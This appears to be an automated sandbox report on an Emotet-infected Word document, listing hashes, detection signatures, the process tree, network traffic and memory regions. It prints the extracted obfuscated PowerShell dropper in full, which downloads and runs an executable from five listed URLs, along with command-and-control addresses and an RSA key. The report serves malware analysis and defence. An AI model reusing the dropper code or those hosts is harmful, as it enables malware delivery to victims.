Analysis

  • max time kernel
    150s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    29-07-2020 01:44

General

  • Target

    emotet_e1_2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5_2020-07-29__014446._doc.doc

  • Size

    172KB

  • MD5

    178a5f6daf5e23231856627d16dfcbff

  • SHA1

    cfb6eeda8a907bb64b27a39692acc15e93560425

  • SHA256

    2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5

  • SHA512

    5c299c4ba5f27710a0dc7ad05d5010d8995ec9c0d0f2fe373772138068dfcce3cf32bbb4d40e4eaf30ff56495044ee05f5db7835ada6fb6a8908b2f79ad36da3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$NBMXIjmb='HCFBYkkt';[Net.ServicePointManager]::"Se`cURIty`p`RoToCOL" = 'tls12, tls11, tls';$IWCMLuhh = '45';$FOLWJseo='PIJHSmun';$PORWJpxj=$env:userprofile+'\'+$IWCMLuhh+'.exe';$SGHJHcqg='GYRBRthc';$RFEFYcip=.('new-ob'+'j'+'ec'+'t') NEt.WebclIent;$BXAUSenl='http://arizonaonsale.com/cgi-bin/VuM64/*https://www.compednet.com/wp-content/Nv55027/*http://eltallerartistico.com/language/Uybj0/*http://classicpaint.net/wp-content/tVS1/*http://closhlab.com/OWN/lUvYIzLMa/'."S`plIt"([char]42);$CEDEDvom='XVNODxeb';foreach($BTEOZcho in $BXAUSenl){try{$RFEFYcip."dOWN`lo`A`dfiLE"($BTEOZcho, $PORWJpxj);$TVGIGdmy='FNQQZplr';If ((.('Ge'+'t-It'+'em') $PORWJpxj)."Len`gTh" -ge 26495) {([wmiclass]'win32_Process')."c`REAte"($PORWJpxj);$NDMVVysk='SUUXQzog';break;$TYZRFejz='HVXDLocn'}}catch{}}$GALKNsug='LPZQLjpy'
URLs
exe.dropper

http://arizonaonsale.com/cgi-bin/VuM64/

exe.dropper

https://www.compednet.com/wp-content/Nv55027/

exe.dropper

http://eltallerartistico.com/language/Uybj0/

exe.dropper

http://classicpaint.net/wp-content/tVS1/

exe.dropper

http://closhlab.com/OWN/lUvYIzLMa/

Extracted

Family

emotet

C2

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5_2020-07-29__014446._doc.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1436
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1740
  • C:\Users\Admin\45.exe
    C:\Users\Admin\45.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1808
    • C:\Windows\SysWOW64\msports\DWrite.exe
      "C:\Windows\SysWOW64\msports\DWrite.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1344

Network

  • DNS
    arizonaonsale.com
    Remote address:
    8.8.8.8:53
    Request
    arizonaonsale.com
    IN A
    Response
    arizonaonsale.com
    IN A
    174.79.51.34
  • GET
    http://arizonaonsale.com/cgi-bin/VuM64/
    powersheLL.exe
    Remote address:
    174.79.51.34:80
    Request
    GET /cgi-bin/VuM64/ HTTP/1.1
    Host: arizonaonsale.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 29 Jul 2020 01:45:15 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Wed, 29 Jul 2020 01:45:15 GMT
    Content-Disposition: attachment; filename="Fx8JncB.exe"
    Content-Transfer-Encoding: binary
    Set-Cookie: 5f20d4ab86ad8=1595987115; expires=Wed, 29-Jul-2020 01:46:15 GMT; Max-Age=60; path=/
    Last-Modified: Wed, 29 Jul 2020 01:45:15 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: application/octet-stream
  • POST
    http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/
    DWrite.exe
    Remote address:
    185.94.252.13:443
    Request
    POST /kNfgDg/smXMaK/ZIU5I/ HTTP/1.1
    Referer: http://185.94.252.13/kNfgDg/smXMaK/ZIU5I/
    Content-Type: multipart/form-data; boundary=---------------------------282305612112810
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 185.94.252.13:443
    Content-Length: 4420
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 29 Jul 2020 01:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 174.79.51.34:80
    http://arizonaonsale.com/cgi-bin/VuM64/
    http
    powersheLL.exe
    12.1kB
    704.1kB
    257
    472

    HTTP Request

    GET http://arizonaonsale.com/cgi-bin/VuM64/

    HTTP Response

    200
  • 179.60.229.168:443
    DWrite.exe
    152 B
    120 B
    3
    3
  • 179.60.229.168:443
    DWrite.exe
    152 B
    120 B
    3
    3
  • 185.94.252.13:443
    http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/
    http
    DWrite.exe
    5.3kB
    908 B
    10
    8

    HTTP Request

    POST http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/

    HTTP Response

    200
  • 224.0.0.252:5355
    100 B
    2
  • 8.8.8.8:53
    arizonaonsale.com
    dns
    63 B
    79 B
    1
    1

    DNS Request

    arizonaonsale.com

    DNS Response

    174.79.51.34

  • 224.0.0.252:5355
    100 B
    2

Downloads

  • memory/1344-15-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/1436-2-0x0000000008980000-0x0000000008984000-memory.dmp

    Filesize

    16KB

  • memory/1436-4-0x0000000006F60000-0x0000000007160000-memory.dmp

    Filesize

    2.0MB

  • memory/1436-5-0x000000000AE30000-0x000000000AE34000-memory.dmp

    Filesize

    16KB

  • memory/1436-6-0x000000000BEB0000-0x000000000BEB4000-memory.dmp

    Filesize

    16KB

  • memory/1436-9-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

  • memory/1808-12-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB
